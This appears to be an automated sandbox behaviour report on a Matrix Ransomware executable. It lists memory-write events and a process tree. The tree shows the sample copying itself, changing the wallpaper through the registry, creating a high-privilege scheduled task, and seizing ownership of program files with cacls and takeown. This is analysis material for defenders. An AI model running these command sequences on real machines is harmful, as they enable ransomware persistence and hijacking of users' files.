PID 1096 wrote to memory of 856 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1270 PID 1096 wrote to memory of 856 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1270 PID 1096 wrote to memory of 856 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1270 PID 856 wrote to memory of 1128 856 cmd.exe 1272 PID 856 wrote to memory of 1128 856 cmd.exe 1272 PID 856 wrote to memory of 1128 856 cmd.exe 1272 PID 856 wrote to memory of 1128 856 cmd.exe 1272 PID 856 wrote to memory of 228 856 cmd.exe 1273 PID 856 wrote to memory of 228 856 cmd.exe 1273 PID 856 wrote to memory of 228 856 cmd.exe 1273 PID 856 wrote to memory of 228 856 cmd.exe 1273 PID 856 wrote to memory of 1996 856 cmd.exe 1274 PID 856 wrote to memory of 1996 856 cmd.exe 1274 PID 856 wrote to memory of 1996 856 cmd.exe 1274 PID 856 wrote to memory of 1996 856 cmd.exe 1274 PID 1996 wrote to memory of 112 1996 cmd.exe 1275 PID 1996 wrote to memory of 112 1996 cmd.exe 1275 PID 1996 wrote to memory of 112 1996 cmd.exe 1275 PID 1996 wrote to memory of 112 1996 cmd.exe 1275 PID 856 wrote to memory of 1800 856 cmd.exe 1276 PID 856 wrote to memory of 1800 856 cmd.exe 1276 PID 856 wrote to memory of 1800 856 cmd.exe 1276 PID 856 wrote to memory of 1800 856 cmd.exe 1276 PID 1096 wrote to memory of 1980 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1277 PID 1096 wrote to memory of 1980 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1277 PID 1096 wrote to memory of 1980 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1277 PID 1096 wrote to memory of 1980 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1277 PID 1980 wrote to memory of 1624 1980 cmd.exe 1279 PID 1980 wrote to memory of 1624 1980 cmd.exe 1279 PID 1980 wrote to memory of 1624 1980 cmd.exe 1279 PID 1980 wrote to memory of 1624 1980 cmd.exe 1279 PID 1980 wrote to memory of 888 1980 cmd.exe 1280 PID 1980 wrote to memory of 888 1980 cmd.exe 1280 PID 1980 wrote to memory of 888 1980 cmd.exe 1280 PID 1980 wrote to memory of 888 1980 cmd.exe 1280 PID 1980 wrote to memory of 1212 1980 cmd.exe 1281 PID 1980 wrote to memory of 1212 1980 cmd.exe 1281 PID 1980 wrote to memory of 1212 1980 cmd.exe 1281 PID 1980 wrote to memory of 1212 1980 cmd.exe 1281 PID 1212 wrote to memory of 216 1212 cmd.exe 1282 PID 1212 wrote to memory of 216 1212 cmd.exe 1282 PID 1212 wrote to memory of 216 1212 cmd.exe 1282 PID 1212 wrote to memory of 216 1212 cmd.exe 1282 PID 1980 wrote to memory of 1068 1980 cmd.exe 1283 PID 1980 wrote to memory of 1068 1980 cmd.exe 1283 PID 1980 wrote to memory of 1068 1980 cmd.exe 1283 PID 1980 wrote to memory of 1068 1980 cmd.exe 1283 PID 1096 wrote to memory of 776 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1284 PID 1096 wrote to memory of 776 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1284 PID 1096 wrote to memory of 776 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1284 PID 1096 wrote to memory of 776 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1284 PID 776 wrote to memory of 1348 776 cmd.exe 1286 PID 776 wrote to memory of 1348 776 cmd.exe 1286 PID 776 wrote to memory of 1348 776 cmd.exe 1286 PID 776 wrote to memory of 1348 776 cmd.exe 1286 PID 776 wrote to memory of 820 776 cmd.exe 1287 PID 776 wrote to memory of 820 776 cmd.exe 1287 PID 776 wrote to memory of 820 776 cmd.exe 1287 PID 776 wrote to memory of 820 776 cmd.exe 1287 PID 776 wrote to memory of 896 776 cmd.exe 1288 PID 776 wrote to memory of 896 776 cmd.exe 1288 PID 776 wrote to memory of 896 776 cmd.exe 1288 PID 776 wrote to memory of 896 776 cmd.exe 1288 PID 896 wrote to memory of 1092 896 cmd.exe 1289 PID 896 wrote to memory of 1092 896 cmd.exe 1289 PID 896 wrote to memory of 1092 896 cmd.exe 1289 PID 896 wrote to memory of 1092 896 cmd.exe 1289 PID 776 wrote to memory of 2032 776 cmd.exe 1290 PID 776 wrote to memory of 2032 776 cmd.exe 1290 PID 776 wrote to memory of 2032 776 cmd.exe 1290 PID 776 wrote to memory of 2032 776 cmd.exe 1290 PID 1096 wrote to memory of 1276 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1291 PID 1096 wrote to memory of 1276 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1291 PID 1096 wrote to memory of 1276 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1291 PID 1096 wrote to memory of 1276 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1291 PID 1276 wrote to memory of 616 1276 cmd.exe 1293 PID 1276 wrote to memory of 616 1276 cmd.exe 1293 PID 1276 wrote to memory of 616 1276 cmd.exe 1293 PID 1276 wrote to memory of 616 1276 cmd.exe 1293 PID 1276 wrote to memory of 1128 1276 cmd.exe 1294 PID 1276 wrote to memory of 1128 1276 cmd.exe 1294 PID 1276 wrote to memory of 1128 1276 cmd.exe 1294 PID 1276 wrote to memory of 1128 1276 cmd.exe 1294 PID 1276 wrote to memory of 212 1276 cmd.exe 1295 PID 1276 wrote to memory of 212 1276 cmd.exe 1295 PID 1276 wrote to memory of 212 1276 cmd.exe 1295 PID 1276 wrote to memory of 212 1276 cmd.exe 1295 PID 212 wrote to memory of 1516 212 cmd.exe 1296 PID 212 wrote to memory of 1516 212 cmd.exe 1296 PID 212 wrote to memory of 1516 212 cmd.exe 1296 PID 212 wrote to memory of 1516 212 cmd.exe 1296 PID 1276 wrote to memory of 1984 1276 cmd.exe 1297 PID 1276 wrote to memory of 1984 1276 cmd.exe 1297 PID 1276 wrote to memory of 1984 1276 cmd.exe 1297 PID 1276 wrote to memory of 1984 1276 cmd.exe 1297 PID 1096 wrote to memory of 1652 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1298 PID 1096 wrote to memory of 1652 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1298 PID 1096 wrote to memory of 1652 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1298 PID 1096 wrote to memory of 1652 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1298 PID 1652 wrote to memory of 1872 1652 cmd.exe 1300 PID 1652 wrote to memory of 1872 1652 cmd.exe 1300 PID 1652 wrote to memory of 1872 1652 cmd.exe 1300 PID 1652 wrote to memory of 1872 1652 cmd.exe 1300 PID 1652 wrote to memory of 900 1652 cmd.exe 1301 PID 1652 wrote to memory of 900 1652 cmd.exe 1301 PID 1652 wrote to memory of 900 1652 cmd.exe 1301 PID 1652 wrote to memory of 900 1652 cmd.exe 1301 PID 1652 wrote to memory of 796 1652 cmd.exe 1302 PID 1652 wrote to memory of 796 1652 cmd.exe 1302 PID 1652 wrote to memory of 796 1652 cmd.exe 1302 PID 1652 wrote to memory of 796 1652 cmd.exe 1302 PID 796 wrote to memory of 1112 796 cmd.exe 1303 PID 796 wrote to memory of 1112 796 cmd.exe 1303 PID 796 wrote to memory of 1112 796 cmd.exe 1303 PID 796 wrote to memory of 1112 796 cmd.exe 1303 PID 1652 wrote to memory of 1956 1652 cmd.exe 1304 PID 1652 wrote to memory of 1956 1652 cmd.exe 1304 PID 1652 wrote to memory of 1956 1652 cmd.exe 1304 PID 1652 wrote to memory of 1956 1652 cmd.exe 1304 PID 1096 wrote to memory of 220 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1305 PID 1096 wrote to memory of 220 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1305 PID 1096 wrote to memory of 220 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1305 PID 1096 wrote to memory of 220 1096 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe 1305 PID 220 wrote to memory of 524 220 cmd.exe 1307 PID 220 wrote to memory of 524 220 cmd.exe 1307 PID 220 wrote to memory of 524 220 cmd.exe 1307 PID 220 wrote to memory of 524 220 cmd.exe 1307 PID 220 wrote to memory of 1868 220 cmd.exe 1308 PID 220 wrote to memory of 1868 220 cmd.exe 1308 PID 220 wrote to memory of 1868 220 cmd.exe 1308 PID 220 wrote to memory of 1868 220 cmd.exe 1308 PID 220 wrote to memory of 236 220 cmd.exe 1309 PID 220 wrote to memory of 236 220 cmd.exe 1309 PID 220 wrote to memory of 236 220 cmd.exe 1309 PID 220 wrote to memory of 236 220 cmd.exe 1309 PID 236 wrote to memory of 1092 236 cmd.exe 1310 PID 236 wrote to memory of 1092 236 cmd.exe 1310 PID 236 wrote to memory of 1092 236 cmd.exe 1310 PID 236 wrote to memory of 1092 236 cmd.exe 1310 PID 220 wrote to memory of 1676 220 cmd.exe 1311 PID 220 wrote to memory of 1676 220 cmd.exe 1311 PID 220 wrote to memory of 1676 220 cmd.exe 1311 PID 220 wrote to memory of 1676 220 cmd.exe 1311
Processes
-
C:\Users\Admin\AppData\Local\Temp\710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe"C:\Users\Admin\AppData\Local\Temp\710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe" "C:\Users\Admin\AppData\Local\Temp\NWs0428A.exe"2⤵PID:1036
-
-
C:\Users\Admin\AppData\Local\Temp\NWs0428A.exe"C:\Users\Admin\AppData\Local\Temp\NWs0428A.exe" -n2⤵
- Executes dropped EXE
PID:1488
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\pd302Bf7.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\pd302Bf7.bmp" /f3⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
PID:1040
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:1576
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\lWdUPW1w.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\lWdUPW1w.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\K8EwiAat.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\K8EwiAat.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:532
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:1076
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:1372
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:1944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Modifies file permissions
PID:864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:528 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Users\Admin\AppData\Local\Temp\V779npJ764.exeV779npJ7.exe -accepteula "AdobeID.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Modifies service
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:1228
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵
- Loads dropped DLL
PID:856 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵
- Modifies file permissions
PID:1488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "ENUtxt.pdf" -nobanner3⤵
- Loads dropped DLL
PID:672 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "ENUtxt.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1092
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1040
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
- Loads dropped DLL
PID:1036 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C3⤵PID:1656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"3⤵PID:796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1876
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:568 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:1484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:672 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:856
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Loads dropped DLL
PID:1848 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵PID:1560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵PID:1500
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1956 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1212
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Loads dropped DLL
PID:1668 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:1484
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵PID:940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
PID:360 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
PID:672
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1152
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Loads dropped DLL
PID:1392 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵
- Modifies file permissions
PID:1876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1740 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
PID:608
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1056
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Loads dropped DLL
PID:1676 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:2004
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵
- Modifies file permissions
PID:796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1796 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1372
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:960 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:1032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:1284 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:1836
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1668
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui""2⤵
- Loads dropped DLL
PID:532 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui" /E /G Admin:F /C3⤵PID:1560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:776
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner3⤵
- Loads dropped DLL
PID:1464 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner4⤵
- Executes dropped EXE
PID:1992
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\Templates\Genko_1.jtp""2⤵
- Loads dropped DLL
PID:340 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" /E /G Admin:F /C3⤵PID:420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Genko_1.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "Genko_1.jtp" -nobanner3⤵
- Loads dropped DLL
PID:796 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "Genko_1.jtp" -nobanner4⤵
- Executes dropped EXE
PID:996
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1076
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\Templates\Shorthand.jtp""2⤵
- Loads dropped DLL
PID:864 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" /E /G Admin:F /C3⤵PID:852
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Shorthand.jtp"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "Shorthand.jtp" -nobanner3⤵
- Loads dropped DLL
PID:1516 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "Shorthand.jtp" -nobanner4⤵
- Executes dropped EXE
PID:1792
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1872
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵
- Loads dropped DLL
PID:960 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:1784
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵
- Loads dropped DLL
PID:1868 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:1144
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""2⤵
- Loads dropped DLL
PID:532 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C3⤵PID:792
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"3⤵PID:1372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "adobepdf.xdc" -nobanner3⤵
- Loads dropped DLL
PID:1148 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "adobepdf.xdc" -nobanner4⤵
- Executes dropped EXE
PID:1796
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵
- Loads dropped DLL
PID:948 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵PID:1032
-
-
